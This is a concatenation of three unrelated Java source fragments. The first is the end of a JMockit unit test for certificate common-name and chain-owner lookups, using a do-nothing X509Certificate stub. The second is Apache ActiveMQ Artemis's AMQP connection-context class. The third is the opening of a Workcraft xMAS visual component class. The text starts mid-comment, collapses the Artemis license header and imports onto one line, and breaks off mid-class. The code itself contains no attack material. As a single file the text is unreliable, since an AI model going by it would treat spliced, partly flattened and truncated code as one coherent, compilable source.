   * matter to the tests, and those are mocked per test.
   */
  class MyX509Certificate extends X509Certificate {
    private static final long serialVersionUID = -3585440601605666278L;

    // Fixed: was missing @Override (it overrides the abstract no-arg
    // checkValidity() declared by X509Certificate).
    @Override
    public void checkValidity() throws CertificateExpiredException, CertificateNotYetValidException {
    }

    @Override
    public boolean hasUnsupportedCriticalExtension() {
      return false;
    }

    @Override
    public Set<String> getCriticalExtensionOIDs() {
      return null;
    }

    @Override
    public Set<String> getNonCriticalExtensionOIDs() {
      return null;
    }

    @Override
    public byte[] getExtensionValue(String oid) {
      return null;
    }

    @Override
    public void checkValidity(Date date) throws CertificateExpiredException, CertificateNotYetValidException {
    }

    @Override
    public int getVersion() {
      return 0;
    }

    @Override
    public BigInteger getSerialNumber() {
      return null;
    }

    @Override
    public Principal getIssuerDN() {
      return null;
    }

    @Override
    public Principal getSubjectDN() {
      return null;
    }

    @Override
    public Date getNotBefore() {
      return null;
    }

    @Override
    public Date getNotAfter() {
      return null;
    }

    @Override
    public byte[] getTBSCertificate() throws CertificateEncodingException {
      return null;
    }

    @Override
    public byte[] getSignature() {
      return null;
    }

    @Override
    public String getSigAlgName() {
      return null;
    }

    @Override
    public String getSigAlgOID() {
      return null;
    }

    @Override
    public byte[] getSigAlgParams() {
      return null;
    }

    @Override
    public boolean[] getIssuerUniqueID() {
      return null;
    }

    @Override
    public boolean[] getSubjectUniqueID() {
      return null;
    }

    @Override
    public boolean[] getKeyUsage() {
      return null;
    }

    @Override
    public int getBasicConstraints() {
      return 0;
    }

    @Override
    public byte[] getEncoded() throws CertificateEncodingException {
      return null;
    }

    @Override
    public void verify(PublicKey key) throws CertificateException, NoSuchAlgorithmException, InvalidKeyException,
        NoSuchProviderException, SignatureException {
    }

    @Override
    public void verify(PublicKey key, String sigProvider) throws CertificateException, NoSuchAlgorithmException,
        InvalidKeyException, NoSuchProviderException, SignatureException {
    }

    @Override
    public String toString() {
      return null;
    }

    @Override
    public PublicKey getPublicKey() {
      return null;
    }
  }

  @Before
  public void setUp() {
  }

  @After
  public void tearDown() {
  }

  /** A subject name containing "CN=" yields that CN in the returned set. */
  @Test
  public void testGetCN(@Mocked X500Principal aX500Principal, @Mocked MyX509Certificate myX509Certificate) {
    new Expectations() {
      {
        aX500Principal.getName();
        result = "CN=Test1234";
        myX509Certificate.getSubjectX500Principal();
        result = aX500Principal;
      }
    };

    MyX509Certificate xxmyX509Certificate = new MyX509Certificate();
    Set<String> strExpect = CertificateUtil.getCN(xxmyX509Certificate);

    // Fixed idiom: assertTrue instead of assertEquals(true, ...).
    Assert.assertTrue(strExpect.contains("Test1234"));
  }

  /** A subject name without a "CN=" attribute yields an empty set. */
  @Test
  public void testGetCNException(@Mocked X500Principal aX500Principal,
      @Mocked MyX509Certificate myX509Certificate) {
    new Expectations() {
      {
        aX500Principal.getName();
        result = "NOCN=Test1234";
        myX509Certificate.getSubjectX500Principal();
        result = aX500Principal;
      }
    };

    MyX509Certificate xxmyX509Certificate = new MyX509Certificate();
    try {
      Set<String> strExpect = CertificateUtil.getCN(xxmyX509Certificate);
      Assert.assertEquals(strExpect.size(), 0);
    } catch (IllegalArgumentException e) {
      // Fixed: was Assert.assertNotNull(null) — an always-failing assertion
      // used as a fail marker; Assert.fail states the intent explicitly.
      Assert.fail("getCN should not throw for a subject without a CN attribute");
    }
  }

  /**
   * When every certificate is self-issued (subject == issuer for all
   * elements), findOwner resolves no distinct owner and returns null.
   */
  @Test
  public void testFindOwner(@Mocked X500Principal aX500Principal1, @Mocked X500Principal aX500Principal2,
      @Mocked MyX509Certificate myX509Certificate) {
    new Expectations() {
      {
        aX500Principal1.getName();
        result = "Huawei";
      }
      {
        aX500Principal2.getName();
        result = "Huawei";
      }
      {
        myX509Certificate.getSubjectX500Principal();
        result = aX500Principal1;
        myX509Certificate.getIssuerX500Principal();
        result = aX500Principal2;
      }
    };

    MyX509Certificate myX509Certificate1 = new MyX509Certificate();
    MyX509Certificate myX509Certificate2 = new MyX509Certificate();

    MyX509Certificate[] xxmyX509Certificate = new MyX509Certificate[2];
    xxmyX509Certificate[0] = myX509Certificate1;
    xxmyX509Certificate[1] = myX509Certificate2;

    X509Certificate aX509Certificate = CertificateUtil.findOwner(xxmyX509Certificate);
    Assert.assertNull(aX509Certificate);
  }

  /**
   * A chain whose issuer names never match any subject has no root CA;
   * findOwner either returns null or reports the broken chain.
   */
  @Test
  public void testFindRootCAException(@Mocked X500Principal aX500Principal1, @Mocked X500Principal aX500Principal2,
      @Mocked MyX509Certificate myX509Certificate) {
    new Expectations() {
      {
        aX500Principal1.getName();
        result = "Huawei1";
      }
      {
        aX500Principal2.getName();
        result = "Huawei3";
      }
      {
        myX509Certificate.getSubjectX500Principal();
        result = aX500Principal1;
        myX509Certificate.getIssuerX500Principal();
        result = aX500Principal2;
      }
    };

    MyX509Certificate myX509Certificate1 = new MyX509Certificate();
    MyX509Certificate myX509Certificate2 = new MyX509Certificate();

    MyX509Certificate[] xxmyX509Certificate = new MyX509Certificate[2];
    xxmyX509Certificate[0] = myX509Certificate1;
    xxmyX509Certificate[1] = myX509Certificate2;

    try {
      X509Certificate aX509Certificate = CertificateUtil.findOwner(xxmyX509Certificate);
      Assert.assertNull(aX509Certificate);
    } catch (IllegalArgumentException e) {
      Assert.assertEquals("bad certificate chain: no root CA.", e.getMessage());
    }
  }
}
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.activemq.artemis.protocol.amqp.proton; import java.net.URI; import java.util.Arrays; import java.util.HashMap; import java.util.Map; import java.util.UUID; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.Future; import java.util.concurrent.FutureTask; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import java.util.function.UnaryOperator; import io.netty.buffer.ByteBuf; import io.netty.channel.EventLoop; import org.apache.activemq.artemis.api.core.ActiveMQSecurityException; import org.apache.activemq.artemis.api.core.SimpleString; import org.apache.activemq.artemis.core.remoting.impl.netty.NettyConnection; import org.apache.activemq.artemis.core.remoting.impl.netty.TransportConstants; import org.apache.activemq.artemis.core.security.CheckType; import org.apache.activemq.artemis.core.security.SecurityAuth; import org.apache.activemq.artemis.protocol.amqp.broker.AMQPConnectionCallback; import org.apache.activemq.artemis.protocol.amqp.broker.AMQPSessionCallback; import 
org.apache.activemq.artemis.protocol.amqp.broker.ProtonProtocolManager;
import org.apache.activemq.artemis.protocol.amqp.exceptions.ActiveMQAMQPException;
import org.apache.activemq.artemis.protocol.amqp.logger.ActiveMQAMQPProtocolLogger;
import org.apache.activemq.artemis.protocol.amqp.logger.ActiveMQAMQPProtocolMessageBundle;
import org.apache.activemq.artemis.protocol.amqp.proton.handler.EventHandler;
import org.apache.activemq.artemis.protocol.amqp.proton.handler.ExecutorNettyAdapter;
import org.apache.activemq.artemis.protocol.amqp.proton.handler.ExtCapability;
import org.apache.activemq.artemis.protocol.amqp.proton.handler.ProtonHandler;
import org.apache.activemq.artemis.protocol.amqp.sasl.AnonymousServerSASL;
import org.apache.activemq.artemis.protocol.amqp.sasl.ClientSASLFactory;
import org.apache.activemq.artemis.protocol.amqp.sasl.PlainSASLResult;
import org.apache.activemq.artemis.protocol.amqp.sasl.SASLResult;
import org.apache.activemq.artemis.spi.core.protocol.RemotingConnection;
import org.apache.activemq.artemis.spi.core.remoting.ReadyListener;
import org.apache.activemq.artemis.utils.ByteUtil;
import org.apache.activemq.artemis.utils.VersionLoader;
import org.apache.qpid.proton.amqp.Symbol;
import org.apache.qpid.proton.amqp.messaging.Source;
import org.apache.qpid.proton.amqp.messaging.TerminusExpiryPolicy;
import org.apache.qpid.proton.amqp.transaction.Coordinator;
import org.apache.qpid.proton.amqp.transport.ErrorCondition;
import org.apache.qpid.proton.engine.Connection;
import org.apache.qpid.proton.engine.Delivery;
import org.apache.qpid.proton.engine.EndpointState;
import org.apache.qpid.proton.engine.Link;
import org.apache.qpid.proton.engine.Receiver;
import org.apache.qpid.proton.engine.Sender;
import org.apache.qpid.proton.engine.Session;
import org.apache.qpid.proton.engine.Transport;
import org.jboss.logging.Logger;

import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.FAILOVER_SERVER_LIST;
import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.HOSTNAME;
import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.NETWORK_HOST;
import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.PORT;
import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.SCHEME;

/**
 * Per-connection context for the AMQP protocol layer.
 *
 * <p>Bridges an Artemis transport connection to a Qpid Proton {@link Transport}/
 * {@link Connection} pair via a {@link ProtonHandler}, and receives the Proton
 * engine callbacks declared on {@link EventHandler} (remote open/close of
 * connections, sessions and links, deliveries, flow updates, SASL events).
 *
 * <p>Threading: most Proton-engine work must run inside the handler's executor;
 * callbacks call {@code handler.requireHandler()} to assert that, and other
 * work is funneled through {@link #runNow(Runnable)} / {@link #runLater(Runnable)}.
 * Keep-alive ticking is (re)scheduled through {@code scheduledFutureRef} with
 * {@link ScheduleOperator} so at most one pending tick task exists at a time.
 */
public class AMQPConnectionContext extends ProtonInitializable implements EventHandler {

   private static final Logger log = Logger.getLogger(AMQPConnectionContext.class);

   // Capability symbol a peer sends to signal that establishing the connection failed.
   public static final Symbol CONNECTION_OPEN_FAILED = Symbol.valueOf("amqp:connection-establishment-failed");
   public static final String AMQP_CONTAINER_ID = "amqp-container-id";

   // Sentinel "already completed" future used as the initial value of
   // scheduledFutureRef, so close() can distinguish "nothing ever scheduled"
   // from a real pending tick task.
   private static final FutureTask<Void> VOID_FUTURE = new FutureTask<>(() -> { }, null);

   protected final ProtonHandler handler;

   private AMQPConnectionCallback connectionCallback;
   private final String containerId;
   private final boolean isIncomingConnection;
   private final ClientSASLFactory saslClientFactory;
   private final Map<Symbol, Object> connectionProperties = new HashMap<>();
   private final ScheduledExecutorService scheduledPool;

   // One AMQPSessionContext per Proton Session; populated lazily in getSessionExtension().
   private final Map<Session, AMQPSessionContext> sessions = new ConcurrentHashMap<>();

   private final ProtonProtocolManager protocolManager;

   private final boolean useCoreSubscriptionNaming;

   /** True when this connection was created by the AMQP bridge (outgoing), not by a remote peer. */
   private final boolean bridgeConnection;

   private final ScheduleOperator scheduleOp = new ScheduleOperator(new ScheduleRunnable());
   // Holds the currently scheduled keep-alive tick; null after close().
   // NOTE(review): raw AtomicReference — a diamond (<>) would be cleaner, left as-is.
   private final AtomicReference<Future<?>> scheduledFutureRef = new AtomicReference(VOID_FUTURE);

   /** Convenience constructor for a non-bridge connection (bridgeConnection = false). */
   public AMQPConnectionContext(ProtonProtocolManager protocolManager,
                                AMQPConnectionCallback connectionSP,
                                String containerId,
                                int idleTimeout,
                                int maxFrameSize,
                                int channelMax,
                                boolean useCoreSubscriptionNaming,
                                ScheduledExecutorService scheduledPool,
                                boolean isIncomingConnection,
                                ClientSASLFactory saslClientFactory,
                                Map<Symbol, Object> connectionProperties) {
      this(protocolManager, connectionSP, containerId, idleTimeout, maxFrameSize, channelMax,
           useCoreSubscriptionNaming, scheduledPool, isIncomingConnection, saslClientFactory,
           connectionProperties, false);
   }

   /**
    * Full constructor: wires the Proton transport/handler onto the underlying
    * Netty event loop (or an adapter when the transport is not Netty-based) and
    * applies idle-timeout / frame-size / channel-max transport settings.
    *
    * @param containerId AMQP container-id; a random UUID is generated when null
    * @param idleTimeout idle timeout in ms; only applied when &gt; 0
    * @param saslClientFactory when non-null this side acts as a SASL client
    */
   public AMQPConnectionContext(ProtonProtocolManager protocolManager,
                                AMQPConnectionCallback connectionSP,
                                String containerId,
                                int idleTimeout,
                                int maxFrameSize,
                                int channelMax,
                                boolean useCoreSubscriptionNaming,
                                ScheduledExecutorService scheduledPool,
                                boolean isIncomingConnection,
                                ClientSASLFactory saslClientFactory,
                                Map<Symbol, Object> connectionProperties,
                                boolean bridgeConnection) {
      this.protocolManager = protocolManager;
      this.bridgeConnection = bridgeConnection;
      this.connectionCallback = connectionSP;
      this.useCoreSubscriptionNaming = useCoreSubscriptionNaming;
      this.containerId = (containerId != null) ? containerId : UUID.randomUUID().toString();
      this.isIncomingConnection = isIncomingConnection;
      this.saslClientFactory = saslClientFactory;

      // Advertise broker identity first so caller-supplied properties may override.
      this.connectionProperties.put(AmqpSupport.PRODUCT, "apache-activemq-artemis");
      this.connectionProperties.put(AmqpSupport.VERSION, VersionLoader.getVersion().getFullVersion());

      if (connectionProperties != null) {
         this.connectionProperties.putAll(connectionProperties);
      }

      this.scheduledPool = scheduledPool;
      connectionCallback.setConnection(this);

      // Reuse the Netty channel's event loop when available; otherwise adapt a
      // server executor so the ProtonHandler still has a single-threaded loop.
      EventLoop nettyExecutor;
      if (connectionCallback.getTransportConnection() instanceof NettyConnection) {
         nettyExecutor = ((NettyConnection) connectionCallback.getTransportConnection()).getNettyChannel().eventLoop();
      } else {
         nettyExecutor = new ExecutorNettyAdapter(protocolManager.getServer().getExecutorFactory().getExecutor());
      }

      // Server-side SASL only for incoming connections that are not SASL clients themselves.
      this.handler = new ProtonHandler(nettyExecutor, protocolManager.getServer().getExecutorFactory().getExecutor(),
                                       isIncomingConnection && saslClientFactory == null);
      handler.addEventHandler(this);

      Transport transport = handler.getTransport();
      transport.setEmitFlowEventOnSend(false);
      if (idleTimeout > 0) {
         transport.setIdleTimeout(idleTimeout);
      }
      transport.setChannelMax(channelMax);
      transport.setInitialRemoteMaxFrameSize(protocolManager.getInitialRemoteMaxFrameSize());
      transport.setMaxFrameSize(maxFrameSize);
      transport.setOutboundFrameSizeLimit(maxFrameSize);
      if (saslClientFactory != null) {
         handler.createClientSASL();
      }
   }

   /** @return true when this connection was created by the AMQP bridge. */
   public boolean isBridgeConnection() {
      return bridgeConnection;
   }

   /** Asserts the current thread is the Proton handler thread. */
   public void requireInHandler() {
      handler.requireHandler();
   }

   /** @return true when the current thread is the Proton handler thread. */
   public boolean isHandler() {
      return handler.isHandler();
   }

   public void scheduledFlush() {
      handler.scheduledFlush();
   }

   public boolean isIncomingConnection() {
      return isIncomingConnection;
   }

   public ClientSASLFactory getSaslClientFactory() {
      return saslClientFactory;
   }

   /** Creates the server-side session context wrapping a new session callback. */
   protected AMQPSessionContext newSessionExtension(Session realSession) throws ActiveMQAMQPException {
      AMQPSessionCallback sessionSPI = connectionCallback.createSessionCallback(this);
      AMQPSessionContext protonSession = new AMQPSessionContext(sessionSPI, this, realSession, protocolManager.getServer());
      return protonSession;
   }

   /** Security principal derived from this connection's SASL result. */
   public SecurityAuth getSecurityAuth() {
      return new LocalSecurity();
   }

   public SASLResult getSASLResult() {
      return handler.getSASLResult();
   }

   /** Feeds raw bytes from the transport into the Proton engine. */
   public void inputBuffer(ByteBuf buffer) {
      if (log.isTraceEnabled()) {
         ByteUtil.debugFrame(log, "Buffer Received ", buffer);
      }
      handler.inputBuffer(buffer);
   }

   public ProtonHandler getHandler() {
      return handler;
   }

   /** Closes the underlying connection callback asynchronously on the handler loop. */
   public void destroy() {
      handler.runLater(() -> connectionCallback.close());
   }

   public boolean isSyncOnFlush() {
      return false;
   }

   public void instantFlush() {
      handler.instantFlush();
   }

   public void flush() {
      handler.flush();
   }

   public void afterFlush(Runnable runnable) {
      handler.afterFlush(runnable);
   }

   /**
    * Closes the connection with the given error condition, first trying to
    * unschedule any pending keep-alive tick so it does not fire after close.
    */
   public void close(ErrorCondition errorCondition) {
      Future<?> scheduledFuture = scheduledFutureRef.getAndSet(null);
      if (scheduledPool instanceof ThreadPoolExecutor && scheduledFuture != null &&
          scheduledFuture != VOID_FUTURE && scheduledFuture instanceof Runnable) {
         // Best effort removal from the pool queue; warn only when the task is
         // neither removable nor already finished/cancelled.
         if (!((ThreadPoolExecutor) scheduledPool).remove((Runnable) scheduledFuture) &&
             !scheduledFuture.isCancelled() && !scheduledFuture.isDone()) {
            ActiveMQAMQPProtocolLogger.LOGGER.cantRemovingScheduledTask();
         }
      }
      handler.close(errorCondition, this);
   }

   /**
    * Returns the context for the given Proton session, creating and registering
    * one lazily if it does not exist yet.
    */
   public AMQPSessionContext getSessionExtension(Session realSession) throws ActiveMQAMQPException {
      AMQPSessionContext sessionExtension = sessions.get(realSession);
      if (sessionExtension == null) {
         // NOTE(review): unexpected for an already-open session — original author
         // suggested logging a warning here.
         sessionExtension = newSessionExtension(realSession);
         realSession.setContext(sessionExtension);
         sessions.put(realSession, sessionExtension);
      }
      return sessionExtension;
   }

   public void runOnPool(Runnable run) {
      handler.runOnPool(run);
   }

   /** Runs immediately when already on the handler thread, otherwise dispatches. */
   public void runNow(Runnable run) {
      handler.runNow(run);
   }

   /** Always enqueues onto the handler loop, even from the handler thread. */
   public void runLater(Runnable run) {
      handler.runLater(run);
   }

   protected boolean validateConnection(Connection connection) {
      return connectionCallback.validateConnection(connection, handler.getSASLResult());
   }

   public boolean checkDataReceived() {
      return handler.checkDataReceived();
   }

   public long getCreationTime() {
      return handler.getCreationTime();
   }

   public String getRemoteContainer() {
      return handler.getConnection().getRemoteContainer();
   }

   public String getPubSubPrefix() {
      return null;
   }

   /** Hook for subclasses; invoked from onRemoteOpen(Connection) before validation. */
   protected void initInternal() throws Exception {
   }

   public AMQPConnectionCallback getConnectionCallback() {
      return connectionCallback;
   }

   /**
    * Attaches a newly opened remote link: transaction coordinator, mirror
    * (replica) target, plain receiver, or sender. Mirror targets require SEND
    * permission on the mirror address before being accepted.
    */
   protected void remoteLinkOpened(Link link) throws Exception {
      AMQPSessionContext protonSession = getSessionExtension(link.getSession());

      if (link.getLocalState() == EndpointState.ACTIVE) {
         // Already active: probably opened locally by the AMQP bridge — nothing to do.
         return;
      }

      link.setSource(link.getRemoteSource());
      link.setTarget(link.getRemoteTarget());
      if (link instanceof Receiver) {
         Receiver receiver = (Receiver) link;
         if (link.getRemoteTarget() instanceof Coordinator) {
            Coordinator coordinator = (Coordinator) link.getRemoteTarget();
            protonSession.addTransactionHandler(coordinator, receiver);
         } else {
            if (isReplicaTarget(receiver)) {
               try {
                  protonSession.getSessionSPI().check(SimpleString.toSimpleString(ProtonProtocolManager.MIRROR_ADDRESS), CheckType.SEND, getSecurityAuth());
               } catch (ActiveMQSecurityException e) {
                  throw ActiveMQAMQPProtocolMessageBundle.BUNDLE.securityErrorCreatingProducer(e.getMessage());
               }
               protonSession.addReplicaTarget(receiver);
            } else {
               protonSession.addReceiver(receiver);
            }
         }
      } else {
         Sender sender = (Sender) link;
         protonSession.addSender(sender);
      }
   }

   /** True when the link targets the broker-mirroring address. */
   private boolean isReplicaTarget(Link link) {
      return link != null && link.getTarget() != null && link.getTarget().getAddress() != null &&
             link.getTarget().getAddress().equals(ProtonProtocolManager.MIRROR_ADDRESS);
   }

   /**
    * Builds the offered-capabilities array; as a side effect publishes the
    * failover server list (if configured) into the connection properties.
    */
   public Symbol[] getConnectionCapabilitiesOffered() {
      URI tc = connectionCallback.getFailoverList();
      if (tc != null) {
         Map<Symbol, Object> hostDetails = new HashMap<>();
         hostDetails.put(NETWORK_HOST, tc.getHost());
         boolean isSSL = tc.getQuery().contains(TransportConstants.SSL_ENABLED_PROP_NAME + "=true");
         if (isSSL) {
            hostDetails.put(SCHEME, "amqps");
         } else {
            hostDetails.put(SCHEME, "amqp");
         }
         hostDetails.put(HOSTNAME, tc.getHost());
         hostDetails.put(PORT, tc.getPort());

         connectionProperties.put(FAILOVER_SERVER_LIST, Arrays.asList(hostDetails));
      }
      return ExtCapability.getCapabilities();
   }

   /** Opens the local end of the AMQP connection with our container-id and properties. */
   public void open() {
      handler.open(containerId, connectionProperties);
   }

   public String getContainer() {
      return containerId;
   }

   public void addEventHandler(EventHandler eventHandler) {
      handler.addEventHandler(eventHandler);
   }

   public ProtonProtocolManager getProtocolManager() {
      return protocolManager;
   }

   public int getAmqpLowCredits() {
      if (protocolManager != null) {
         return protocolManager.getAmqpLowCredits();
      } else {
         // protocolManager is only null in tests
         return AmqpSupport.AMQP_LOW_CREDITS_DEFAULT;
      }
   }

   public int getAmqpCredits() {
      if (protocolManager != null) {
         return protocolManager.getAmqpCredits();
      } else {
         // protocolManager is only null in tests
         return AmqpSupport.AMQP_CREDITS_DEFAULT;
      }
   }

   public boolean isUseCoreSubscriptionNaming() {
      return useCoreSubscriptionNaming;
   }

   /**
    * Starts server-side SASL negotiation, or — when SASL is not in use and
    * anonymous access is not allowed — advertises SASL support and closes.
    */
   @Override
   public void onAuthInit(ProtonHandler handler, Connection connection, boolean sasl) {
      if (sasl) {
         // Configured mechanisms, in decreasing order of preference.
         String[] mechanisms = connectionCallback.getSaslMechanisms();
         if (mechanisms == null || mechanisms.length == 0) {
            mechanisms = AnonymousServerSASL.ANONYMOUS_MECH;
         }
         handler.createServerSASL(mechanisms);
      } else {
         if (!connectionCallback.isSupportsAnonymous()) {
            connectionCallback.sendSASLSupported();
            connectionCallback.close();
            handler.close(null, this);
         }
      }
   }

   @Override
   public void onSaslRemoteMechanismChosen(ProtonHandler handler, String mech) {
      handler.setChosenMechanism(connectionCallback.getServerSASL(mech));
   }

   @Override
   public void onSaslMechanismsOffered(final ProtonHandler handler, final String[] mechanisms) {
      if (saslClientFactory != null) {
         handler.setClientMechanism(saslClientFactory.chooseMechanism(mechanisms));
      }
   }

   @Override
   public void onAuthFailed(final ProtonHandler protonHandler, final Connection connection) {
      connectionCallback.close();
      handler.close(null, this);
   }

   @Override
   public void onAuthSuccess(final ProtonHandler protonHandler, final Connection connection) {
      connection.open();
   }

   @Override
   public void onTransport(Transport transport) {
      handler.flushBytes();
   }

   /** Pushes engine-produced bytes down to the transport. */
   @Override
   public void pushBytes(ByteBuf bytes) {
      connectionCallback.onTransport(bytes, this);
   }

   @Override
   public boolean flowControl(ReadyListener readyListener) {
      return connectionCallback.isWritable(readyListener);
   }

   @Override
   public String getRemoteAddress() {
      return connectionCallback.getTransportConnection().getRemoteAddress();
   }

   /**
    * Remote peer opened the connection: validate it, mirror the open locally,
    * and schedule the first keep-alive tick when idle-timeout applies.
    */
   @Override
   public void onRemoteOpen(Connection connection) throws Exception {
      handler.requireHandler();
      try {
         initInternal();
      } catch (Exception e) {
         log.error("Error init connection", e);
      }
      if (!validateConnection(connection)) {
         connection.close();
      } else {
         connection.setContext(AMQPConnectionContext.this);
         connection.setContainer(containerId);
         connection.setProperties(connectionProperties);
         connection.setOfferedCapabilities(getConnectionCapabilitiesOffered());
         connection.open();
      }
      initialize();

      /*
       * This can be null which is in effect an empty map, also we really don't need to check this for in bound connections
       * but its here in case we add support for outbound connections.
       */
      if (connection.getRemoteProperties() == null || !connection.getRemoteProperties().containsKey(CONNECTION_OPEN_FAILED)) {
         long nextKeepAliveTime = handler.tick(true);
         if (nextKeepAliveTime != 0 && scheduledPool != null) {
            // tick() returns an absolute deadline; convert to a relative delay.
            scheduleOp.setDelay(nextKeepAliveTime - TimeUnit.NANOSECONDS.toMillis(System.nanoTime()));
            scheduledFutureRef.getAndUpdate(scheduleOp);
         }
      }
   }

   /**
    * Atomically replaces the pending tick future with a newly scheduled one.
    * Maps null -> null so no new tick is scheduled once close() has run.
    */
   class ScheduleOperator implements UnaryOperator<Future<?>> {

      private long delay;
      final ScheduleRunnable scheduleRunnable;

      ScheduleOperator(ScheduleRunnable scheduleRunnable) {
         this.scheduleRunnable = scheduleRunnable;
      }

      @Override
      public Future<?> apply(Future<?> future) {
         return (future != null) ? scheduledPool.schedule(scheduleRunnable, delay, TimeUnit.MILLISECONDS) : null;
      }

      public void setDelay(long delay) {
         this.delay = delay;
      }
   }

   /** Performs one keep-alive tick and reschedules itself as needed. */
   class TickerRunnable implements Runnable {

      @Override
      public void run() {
         Long rescheduleAt = handler.tick(false);

         if (rescheduleAt == null) {
            // tick could not acquire its lock; just retry in 10 milliseconds.
            scheduleOp.setDelay(10);
            scheduledFutureRef.getAndUpdate(scheduleOp);
         } else if (rescheduleAt != 0) {
            scheduleOp.setDelay(rescheduleAt - TimeUnit.NANOSECONDS.toMillis(System.nanoTime()));
            scheduledFutureRef.getAndUpdate(scheduleOp);
         }
      }
   }

   /** Scheduled-pool entry point: hops onto the handler loop before ticking. */
   class ScheduleRunnable implements Runnable {

      final TickerRunnable tickerRunnable = new TickerRunnable();

      @Override
      public void run() {
         // The actual tick has to happen within a Netty worker to avoid a lock;
         // this also flushes data directly on the netty connection's executor.
         handler.runLater(tickerRunnable);
      }
   }

   /** Remote close: tear down all sessions, flush pending bytes, destroy. */
   @Override
   public void onRemoteClose(Connection connection) {
      handler.requireHandler();
      connection.close();
      connection.free();

      for (AMQPSessionContext protonSession : sessions.values()) {
         protonSession.close();
      }
      sessions.clear();

      // We must force write the channel before we actually destroy the connection.
      handler.flushBytes();
      destroy();
   }

   @Override
   public void onLocalOpen(Session session) throws Exception {
      AMQPSessionContext sessionContext = getSessionExtension(session);

      // Locally opened sessions only originate from the bridge; initialize eagerly there.
      if (bridgeConnection) {
         sessionContext.initialize();
      }
   }

   @Override
   public void onRemoteOpen(Session session) throws Exception {
      handler.requireHandler();
      getSessionExtension(session).initialize();
      session.open();
   }

   @Override
   public void onRemoteClose(Session session) throws Exception {
      // Deferred so in-flight work on this session drains before teardown.
      handler.runLater(() -> {
         session.close();
         session.free();

         AMQPSessionContext sessionContext = (AMQPSessionContext) session.getContext();
         if (sessionContext != null) {
            sessionContext.close();
            sessions.remove(session);
            session.setContext(null);
         }
      });
   }

   @Override
   public void onRemoteOpen(Link link) throws Exception {
      remoteLinkOpened(link);
   }

   @Override
   public void onFlow(Link link) throws Exception {
      if (link.getContext() != null) {
         ((ProtonDeliveryHandler) link.getContext()).onFlow(link.getCredit(), link.getDrain());
      }
   }

   /**
    * Remote link close: close the delivery handler first, then (in a later
    * handler pass) close/free the link and flush — ordering matters because the
    * context close may itself schedule work on the loop.
    */
   @Override
   public void onRemoteClose(Link link) throws Exception {
      handler.requireHandler();

      // Run through anything that's pending on the current deliveries first.
      runNow(() -> {
         ProtonDeliveryHandler linkContext = (ProtonDeliveryHandler) link.getContext();
         if (linkContext != null) {
            try {
               linkContext.close(true);
            } catch (Exception e) {
               log.error(e.getMessage(), e);
            }
         }

         // link.close must happen after linkContext.close has finished;
         // linkContext.close performs a few executions on the netty loop,
         // so this has to come next.
         runLater(() -> {
            link.close();
            link.free();
            flush();
         });
      });
   }

   /** Detach is treated as close when the source's expiry policy says so. */
   @Override
   public void onRemoteDetach(Link link) throws Exception {
      handler.requireHandler();
      boolean handleAsClose = link.getSource() != null &&
                              ((Source) link.getSource()).getExpiryPolicy() == TerminusExpiryPolicy.LINK_DETACH;

      if (handleAsClose) {
         onRemoteClose(link);
      } else {
         link.detach();
         link.free();
      }
   }

   @Override
   public void onLocalDetach(Link link) throws Exception {
      handler.requireHandler();
      Object context = link.getContext();
      if (context instanceof ProtonServerSenderContext) {
         ProtonServerSenderContext senderContext = (ProtonServerSenderContext) context;
         senderContext.close(false);
      }
   }

   /** Routes an incoming delivery to the link's delivery handler. */
   @Override
   public void onDelivery(Delivery delivery) throws Exception {
      handler.requireHandler();
      // NOTE(review): local 'handler' shadows the ProtonHandler field.
      ProtonDeliveryHandler handler = (ProtonDeliveryHandler) delivery.getLink().getContext();
      if (handler != null) {
         handler.onMessage(delivery);
      } else {
         log.warn("Handler is null, can't delivery " + delivery, new Exception("tracing location"));
      }
   }

   /** SecurityAuth view backed by this connection's SASL result. */
   private class LocalSecurity implements SecurityAuth {

      @Override
      public String getUsername() {
         String username = null;
         SASLResult saslResult = getSASLResult();
         if (saslResult != null) {
            username = saslResult.getUser();
         }
         return username;
      }

      @Override
      public String getPassword() {
         String password = null;
         SASLResult saslResult = getSASLResult();
         if (saslResult != null) {
            // Only the PLAIN mechanism exposes a password.
            if (saslResult instanceof PlainSASLResult) {
               password = ((PlainSASLResult) saslResult).getPassword();
            }
         }
         return password;
      }

      @Override
      public RemotingConnection getRemotingConnection() {
         return connectionCallback.getProtonConnectionDelegate();
      }

      @Override
      public String getSecurityDomain() {
         return getProtocolManager().getSecurityDomain();
      }
   }
}
package org.workcraft.plugins.xmas.components;

import org.workcraft.dom.Container;
import org.workcraft.dom.DefaultGroupImpl;
import org.workcraft.dom.Node;
import org.workcraft.dom.visual.*;
import org.workcraft.gui.properties.PropertyDeclaration;
import org.workcraft.gui.tools.Decoration;
import org.workcraft.observation.*;
import org.workcraft.plugins.builtin.settings.VisualCommonSettings;
import org.workcraft.plugins.xmas.XmasSettings;
import org.workcraft.plugins.xmas.components.XmasContact.IOType;
import org.workcraft.utils.ColorUtils;

import java.awt.*;
import java.awt.geom.AffineTransform;
import java.awt.geom.Point2D;
import java.awt.geom.Rectangle2D;
import java.util.ArrayList;
import java.util.Collection;

/**
 * Base visual node for an xMAS component.
 *
 * <p>Owns its contact children through a {@link DefaultGroupImpl} (acting as a
 * {@link Container} and {@link ObservableHierarchy}), exposes an editable
 * "Orientation" property (quadrant rotation), and renders the subclass-provided
 * {@link #getShape()} rotated by that orientation.
 */
public abstract class VisualXmasComponent extends VisualComponent implements Container, StateObserver, ObservableHierarchy {

    public static final String DEGREE_SYMBOL = Character.toString((char) 0x00B0);
    public static final double SIZE = VisualCommonSettings.getNodeSize();
